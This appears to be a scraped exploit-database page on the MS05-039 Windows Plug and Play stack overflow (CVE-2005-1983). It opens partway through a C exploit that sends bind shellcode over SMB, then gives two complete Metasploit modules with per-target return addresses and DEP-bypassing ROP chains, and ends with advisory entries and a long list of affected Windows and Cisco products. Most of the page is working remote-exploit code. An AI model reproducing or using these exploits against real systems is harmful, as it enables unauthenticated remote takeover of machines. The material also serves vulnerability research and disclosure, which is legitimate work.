	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '\0', 8);



	printf("\n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed\n");
		exit(0);
	}
	printf("ok\n");

	printf("[*] null session...");
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
	convert_name(ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, packet, ptr-packet, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] bind pipe...");

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] sending crafted packet...");

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = (unsigned short)atoi(argv[2]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, packet, 2196, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}
	printf("ok\n");
	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

	recv(sockfd, recvbuf, 4096, 0);

return 0;
}

// milw0rm.com [2005-08-25]
		

- 漏洞信息 (16365)

Microsoft Plug and Play Service Overflow (EDBID:16365)
windows dos
2010-08-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms05_039_pnp.rb 10190 2010-08-30 20:40:05Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Plug and Play Service Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Windows Plug
				and Play service. This vulnerability can be exploited on
				Windows 2000 without a valid user account.

				NOTE: Since the PnP service runs inside the service.exe process, a failed
				exploit attempt will cause the system to automatically reboot.
			},
			'Author'         => [ 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10190 $',
			'References'     =>
				[
					[ 'CVE', '2005-1983' ],
					[ 'OSVDB', '18605' ],
					[ 'BID', '14513' ],
					[ 'MSB', 'MS05-039' ],
					[ 'URL', 'http://www.hsc.fr/ressources/presentations/null_sessions/' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'Compat'   =>
						{
							# -ws2ord XXX?
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
						{
							'Ret'      => 0x767a38f6, # umpnpmgr.dll
						},
					],
					[
						'Windows 2000 SP4 French',
						{
							'Ret'      => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
						},
					],
					[
						'Windows 2000 SP4 Spanish',
						{
							'Ret'      => 0x767738f6, # umpnpmgr.dll
						},
					],
					[
						'Windows 2000 SP4 English/French/German/Dutch',
						{
							'Ret'      => 0x01013C79, # [Pita] [Houmous] <pita@mail.com>
						},
					],
					[
						'Windows 2000 SP0-SP4 German',
						{
							'Ret'      => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>
						},
					],
					[
						'Windows 2000 SP0-SP4 Italian',
						{
							'Ret'      => 0x7677366f, # acaro <acaro@jervus.it>
						},
					],
					[
						'Windows XP SP1 English',
						{
							'Ret'      => 0x758c572a, # pop edi / pop ebx / ret in umpnpmgr.dll v5.1.2600.1106
							'Pipe'     => 'ntsvcs',
							'Offset'   => 16,
						}
					],
					# NOTE: XP SP2, Server 2003 (and SP1) require an Administrator account to access
					# the vulnerable functionality.
					[
						'Windows XP SP2 English (Requires Admin)',
						# SafeSEH enabled, DEP AlwaysOn
						{
							#'Ret'       => 0x41424344,
							'Ret'       => 0x758d2bb3,  # pop eax / ret 0x8
							'Pipe'      => 'ntsvcs',
							'PtrToZero' => 0x758c0170,  # PE data of umpnpmgr.dll v5.1.2600.2180
							'Offset'    => 72,
							'EspOffset' => 108,
							'RopStack'  =>
								# All addresses are from umpnpmgr.dll v5.2.3790.1830
								[
									#
									# Step 1. Allocate an executable heap with HeapCreate
									#
									# Resolve HeapCreate from import
									0x758c1148,            # pointer to HeapCreate import
									0x758c2950,            # mov eax, [eax] / pop ebp / ret 0x8
									0x41414141,            # scratch
									0x41414141,            # scratch
									#0x758da008,            # becomes ebp (something writable)
									0x758da1c8-0xc,        # becomes ebp (writable, used later)

									# Call HeapCreate
									0x758cb728,            # call eax / mov [ebp+0xc],eax / jmp... / mov eax,[ebp+0xc] / pop edi,esi,ebx,ebp / ret 0xc
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x01040110,            # flOptions (gets & with 0x40005)
									0x01010101,
									0x01010101,
									0x758ce552,            # becomes edi - pop edi,esi / ret
									0x758cdd7e,            # becomes esi - pop esi,ebx,ebp / ret 0x4
									0x41414141,            # becomes ebx
									0x41414141,            # becomes ebp

									# Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base
									0x758d45f3,            # or eax,0x8000 / pop ebp / ret 0x4
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # becomes ebp

									# save eax to ebx
									0x758ce0d5,            # push eax / call esi
									0x41414141,            # scratch
									0x758da008+0x18,       # becomes ebp

									# Setup eax to load our saved stack pointer
									0x758d18db,            # pop eax / ret 0xc
									0x41414141,            # scratch
									0x758c524e,            # becomes eax - pop ebp / ret 0x8
									#0x758c2423,            # becomes eax - pop esi,ebp / ret 0x8

									# Store a pointer to the stack to a known address (ebp-0x18), flows to eax after
									0x758c1281,            # mov [ebp-0x18],esp / push eax / mov eax,[ebp-4] / mov [ebp-4],0xffffffff / mov [ebp-8],eax / lea eax,[ebp-0x10] / mov fs:[0],eax / ret
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									#0xcafebabe,            # becomes esi
									0x758da008-0x10,       # becomes ebp

									# Call lstrcpyW to copy shellcode into executable heap
									0x758c542e,            # push [ebp+0x10] / push ebx / call lstrcpyW / push ebx / call edi
									0x41414141,            # scratch
									0x41414141,            # scratch

									# Skip the junk
									0x758c96f6,            # add al,0x3b / ret

									# Call the executable segment!
									0x758c3b62             # call eax
								]
						}
					],
					[
						'Windows Server 2003 SP0 English (Requires Admin)',
						# SafeSEH unsupported, DEP unsupported
						{
							'Ret'       => 0x780df756, # push esp / ret in msvcp60.dll
							'Pipe'      => 'ntsvcs',
							'PtrToZero' => 0x757702c0, # PE data of umpnpmgr.dll
							'Offset'    => 72,
						}
					],
					[
						'Windows Server 2003 SP1 English (Requires Admin)',
						# SafeSEH enabled, DEP AlwaysOn
						{
							'Pipe'      => 'ntsvcs',
							# We will need to bypass DEP!
							#'Ret'       => 0x41424344,
							'Ret'       => 0x757873d5,  # pop eax / ret 0x4
							'PtrToZero' => 0x757702c0,  # PE data of umpnpmgr.dll
							'Offset'    => 72,          # offset to saved eip
							'EspOffset' => 108,         # Offset to where esp ends up pointing
							'RopStack'  =>              # NOTE: 0x41414141 will become random data
								# All addresses are from umpnpmgr.dll v5.2.3790.1830
								[
									#
									# Step 1. Allocate an executable heap with HeapCreate
									#
									# Resolve HeapCreate from import
									0x75771144,            # pointer to HeapCreate import
									0x75772e68,            # mov eax, [eax] / pop ebp / ret
									0x41414141,            # scratch
									0x41414141,            # becomes ebp
									# Call HeapCreate
									0x7578bc37,            # jmp eax
									0x41414141,            # scratch
									0x41414141,            # scratch
									# Save the new heap address in edi
									0x757791d5,            # xchg eax,edi / cmp bh,0xff / ret 0x10
									0x01040110,            # flOptions (gets & with 0x40005)
									0x01010101,
									0x01010101,

									#
									# Step 2. Allocate a buffer using this new heap.
									#
									0x757873d5,            # pop eax / ret 0x4
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									# Resolve HeapAlloc from import
									0x7577115c,            # pointer to HeapAlloc import
									0x75772e68,            # mov eax, [eax] / pop ebp / ret
									0x41414141,            # scratch
									0x41414141,            # becomes ebp
									# Save the address of HeapAlloc in esi
									0x75777ae0,            # xchg eax,esi / mov dl,0xff / dec ecx / ret
									0x41414141,            # scratch
									0x41414141,            # scratch
									# Call HeapAlloc
									0x7578bb6b,            # push edi / call esi / pop edi,esi,ebp / ret
									0xffffffff,            # flags
									0x00010001,            # allocation size
									0x0101018d,            # becomes edi / first byte stored
									0x7577835c,            # becomes esi - pop esi / pop ebx / ret
									0x757830c3,            # becomes ebp/eip - pop esi / ret

									#
									# Step 3. Save the heap address into ebx
									#
									0x7578308f,            # push eax / mov [0x7578d8e0],edi / mov [0x7578d39c],edi / call esi
									0x41414141,            # scratch
									# Put heap address in edi
									0x757791d5,            # xchg eax,edi / cmp bh,0xff / ret 0x10

									#
									# Step 4. Write stub:
									#
									# metasm > lea esi,[esp+4]; _start: lodsb; test al,al; jz _out; stosb; _end: jmp _start; _out:
									# "\x8d\x74\x24\x04\xac\x84\xc0\x74\x03\xaa\xeb\xf8"
									#
									# Store the first byte.
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010174,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010124,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010104,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101ac,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010184,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101c0,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010174,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010103,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101aa,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101eb,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101f8,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch

									#
									# Step 5. Finally, call our executable heap buffer.
									#
									0x75783efe             # call ebx
								]
						}
					]
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Aug 9 2005'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
			], self.class)

	end

	def pnp_probe(req, pipe = datastore['SMBPIPE'])

		print_status("Connecting to the SMB service...")
		begin
			connect()
			smb_login()
		rescue ::Exception => e
			print_error("Error: #{e.class} #{e}")
		end

		handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		# CS_DES
		cs_des =
			NDR.long(0) + # CSD_SignatureLength
			NDR.long(0) + # CSD_LegacyDataOffset
			NDR.long(req.length) + # CSD_LegacyDataSize
			NDR.long(0) + # CSD_Flags
			rand_text(16) + # GUID
			req # CSD_LegacyData

		# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);

		# ResourceName:
		stubdata =
			NDR.UnicodeConformantVaryingString("a\\b\\c") +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
			NDR.long(0xffff) +                               # ResourceID: ResType_ClassSpecific
			NDR.UniConformantArray(cs_des) +                 # Resource (our CS_DES structure)
			NDR.long(cs_des.length) +                        # ResourceLen
			NDR.long(4) +                                    # OutputLen (at least 4)
			NDR.long(0)                                      # Flags

		print_status("Calling the vulnerable function...")

		begin
			dcerpc.call(0x36, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			print_status('Server did not respond, this is expected')
		rescue => e
			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
				print_status('Server disconnected, this is expected')
			else
				raise e
			end
		end

		# Cleanup
		disconnect

		if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil and
				dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
			return true
		else
			return false
		end
	end

	def check
		if (pnp_probe('A'))
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		# If PtrToZero is set, we use saved-ret-overwrite instead of SEH.
		if target['PtrToZero'] then
			eip_off = target['Offset']
			nul_off = eip_off + 8

			# DEP Bypass version (2003 SP1)
			if target['RopStack']
				esp_off = target['EspOffset']

				# Start with a randomized base buffer
				rop_length = target['RopStack'].length * 4
				print_status("ROP Data is %u bytes" % rop_length)
				buf = rand_text(esp_off + rop_length)

				# Put the rest of the stack data at where esp ends up...
				target['RopStack'].each_with_index { |el,idx|
					if el != 0x41414141
						buf[esp_off + (idx*4), 4] = [el].pack('V')
					end
				}
			else
				# Start with a randomized base buffer
				buf = rand_text(nul_off)
			end

			# This becomes EIP
			buf[eip_off,4] = [target.ret].pack('V')

			# Pointer to NULL (4 zero bytes)
			buf[nul_off,4] = [target['PtrToZero']].pack('V')
		else
			# Pad the string up to reach our SEH frame
			buf = rand_text(target['Offset'] ? target['Offset'] : 56)

			# Jump over the address and our invalid pointer to the payload
			buf << Rex::Arch::X86.jmp_short('$+32')
			buf << rand_text(2)

			# The SEH handler pointer
			buf << [target.ret].pack('V')

			# Some padding to reach the next pointer
			buf << rand_text(20)

			# ResourceName - cause access violation on RtlInitUnicodeString
			buf << rand_text(3) + "\xff"
		end

		# Append the encoded payload and we are good to go!
		buf << payload.encoded

		# Determine which pipe to use
		pipe = target['Pipe'] ? target['Pipe'] :  datastore['SMBPIPE']

		pnp_probe(buf, pipe)

		print_status('The server should have executed our payload')

		handler
	end

end
		

- 漏洞信息 (F83078)

Microsoft Plug and Play Service Overflow (PacketStormID:F83078)
2009-11-26 00:00:00
H D Moore,cazz  metasploit.com
exploit,overflow
windows,2k
CVE-2005-1983
[点击下载]

This Metasploit module exploits a stack overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB
	

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft Plug and Play Service Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the Windows Plug
				and Play service. This vulnerability can be exploited on
				Windows 2000 without a valid user account. Since the PnP
				service runs inside the service.exe process, a failed
				exploit attempt will cause the system to automatically
				reboot. 
					
			},
			'Author'         => [ 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1983'],
					[ 'OSVDB', '18605'],
					[ 'BID', '14513'],
					[ 'MSB', 'MS05-039'],
					[ 'URL', 'http://www.hsc.fr/ressources/presentations/null_sessions/'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "",
					'Compat'   => 
					{
						# -ws2ord XXX?
					},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 
						'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
						{
							'Ret'      => 0x767a38f6, # umpnpmgr.dll
						},
					],
					[ 
						'Windows 2000 SP4 French',
						{
							'Ret'      => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
						},
					],
					[ 
						'Windows 2000 SP4 Spanish',
						{
							'Ret'      => 0x767738f6, # umpnpmgr.dll
						},
					],
					[ 
						'Windows 2000 SP4 English/French/German/Dutch',
						{
							'Ret'      => 0x01013C79, # [Pita] [Houmous] <pita@mail.com>
						},
					],					
					[ 
						'Windows 2000 SP0-SP4 German',
						{
							'Ret'      => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>	
						},
					],
					[ 
						'Windows 2000 SP0-SP4 Italian',
						{
							'Ret'      => 0x7677366f, # acaro <acaro@jervus.it>
						},
					],
					[
						'Windows XP SP1 English',
						{
							'Ret'      => 0x758c572a,
							'Pipe'     => 'ntsvcs',
							'Offset'   => 16,
						}
					]																		
				],

			'DefaultTarget' => 0,
			'DisclosureDate' => 'Aug 9 2005'))
			
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
			], self.class)
						
	end

	def pnp_probe(req, pipe = datastore['SMBPIPE'])
		
		print_status("Connecting to the SMB service...")
		connect()
		smb_login()

		handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		# CS_DES
		cs_des = 
			NDR.long(0) + # CSD_SignatureLength
			NDR.long(0) + # CSD_LegacyDataOffset
			NDR.long(req.length) + # CSD_LegacyDataSize
			NDR.long(0) + # CSD_Flags
			rand_text(16) + # GUID
			req # CSD_LegacyData

		# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
		
		# ResourceName:
		stubdata = 
			NDR.UnicodeConformantVaryingString("a\\b\\c") +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
			NDR.long(0xffff) +                               # ResourceID: ResType_ClassSpecific
			NDR.UniConformantArray(cs_des) +                 # Resource (our CS_DES structure)
			NDR.long(cs_des.length) +                        # ResourceLen	
			NDR.long(4) +                                    # OutputLen (at least 4)
			NDR.long(0)                                      # Flags

		print_status("Calling the vulnerable function...")
		
		begin
			dcerpc.call(0x36, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			print_good('Server did not respond, this is expected')
		rescue => e
			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
				print_good('Server disconnected, this is expected')
			else
				raise e
			end
		else 
			print_status('The server should have executed our payload')
		end

		# Cleanup
		handler
		disconnect	
	
		if (dcerpc.last_response != nil and 
			dcerpc.last_response.stub_data != nil and 
			dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
			return true
		else 
			return false
		end
	end
	
	def check
		if (pnp_probe('A'))
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit		
		# Pad the string up to reach our SEH frame
		buf = rand_text(target['Offset'] ? target['Offset'] : 56)

		# Jump over the address and our invalid pointer to the payload
		buf << Rex::Arch::X86.jmp_short('$+32')
		buf << rand_text(2)

		# The SEH handler pointer
		buf << [target.ret].pack('V')
		
		# Some padding to reach the next pointer
		buf << rand_text(20)
		
		# ResourceName - cause access violation on RtlInitUnicodeString
		buf << rand_text(3) + "\xff"
		
		# Append the encoded payload and we are good to go!
		buf << payload.encoded
		
		# Determine which pipe to use
		pipe = target['Pipe'] ? target['Pipe'] :  datastore['SMBPIPE']

		pnp_probe(buf, pipe)	
	end

end
    

- 漏洞信息 (F39254)

HOD-ms05039-pnp-expl.c (PacketStormID:F39254)
2005-08-13 00:00:00
houseofdabus  
exploit,remote,overflow
windows,2k,xp
CVE-2005-1983
[点击下载]

Microsoft Windows Plug-and-Play remote overflow universal exploit that is related to MS05-039. Vulnerable systems include: Microsoft Windows Server 2003 SP1, Microsoft Windows XP SP1 and SP2, and Microsoft Windows 2000 SP4.

- 漏洞信息 (F39227)

ms05039.c (PacketStormID:F39227)
2005-08-12 00:00:00
 
exploit,remote
windows,2k
CVE-2005-1983
[点击下载]

Microsoft Windows 2000 Plug and Play universal remote exploit for the flaw discussed in MS05-039.

- 漏洞信息

18605
Microsoft Windows Plug-and-Play Service Remote Overflow
Local Access Required, Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in Windows. The Plug and Play Service fails to validate the length of a message resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-08-09 Unknow
2005-08-11 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Plug and Play Buffer Overflow Vulnerability
Boundary Condition Error 14513
Yes Yes
2005-08-09 12:00:00 2008-03-13 06:21:00
Discovery is credited to Neel Mehta of ISS X-Force.

- 受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Cisco Web Collaboration Option
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Transport Manager
Cisco Trailhead
Cisco Support Tools
Cisco SN5400 series storage routers
Cisco Remote Monitoring Suite Option
Cisco Personal Assistant 1.4 (2)
Cisco Personal Assistant 1.4 (1)
Cisco Personal Assistant 1.3 (4)
Cisco Personal Assistant 1.3 (3)
Cisco Personal Assistant 1.3 (2)
Cisco Personal Assistant 1.3 (1)
Cisco Outbound Option
Cisco Networking Services for Active Directory
Cisco Media Blender
Cisco IP/VC 3540 Video Rate Matching Module
Cisco IP/VC 3540 Application Server
Cisco IP Queue Manager
Cisco IP Interactive Voice Response (IP IVR) 3.0
Cisco IP Contact Center Remote Agent
Cisco IP Contact Center Hosted
Cisco IP Contact Center Express
Cisco IP Contact Center Enterprise
Cisco ICM Hosted Edition
Cisco ICM Enterprise Edition
Cisco Emergency Responder 1.1
Cisco E-Mail Manager
Cisco DOCSIS CPE Configurator
Cisco Customer Voice Portal
Cisco Customer Response Application Server
Cisco Conference Connection 1.2
Cisco Conference Connection 1.1 (1)
Cisco Computer Telephony Integration Option
Cisco Collaboration Server 5.0
Cisco Collaboration Server 4.0
Cisco Collaboration Server 3.0 2
Cisco Collaboration Server 3.0 1
Cisco Collaboration Server 3.0
Cisco CNS Network Registrar 6.1.1 .4
Cisco CNS Network Registrar 6.1.1 .3
Cisco CNS Network Registrar 6.1.1 .2
Cisco CNS Network Registrar 6.1.1 .1
Cisco CNS Network Registrar 6.1.1
Cisco CNS Network Registrar 6.1
Cisco CNS Network Registrar 6.0.5 .4
Cisco CNS Network Registrar 6.0.5 .3
Cisco CNS Network Registrar 6.0.5 .2
Cisco CNS Network Registrar 6.0.5
Cisco CNS Network Registrar 6.0.4
Cisco CNS Network Registrar 6.0.3
Cisco CNS Network Registrar 6.0.2
Cisco CNS Network Registrar 6.0.1
Cisco CNS Network Registrar 6.0
Cisco CiscoWorks
Cisco Call Manager 4.1 (3)SR1
Cisco Call Manager 4.1 (3)ES07
Cisco Call Manager 4.1 (2)ES33
Cisco Call Manager 4.0 (2a)SR2b
Cisco Call Manager 4.0 (2a)ES40
Cisco Call Manager 4.0
Cisco Call Manager 3.3 (5)
Cisco Call Manager 3.3 (4)ES25
Cisco Call Manager 3.3 (3)ES61
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Building Broadband Service Manager (BBSM) 5.2
Cisco Building Broadband Service Manager (BBSM) 5.1
Cisco Building Broadband Service Manager (BBSM) 5.0
Cisco Building Broadband Service Manager (BBSM) 4.5
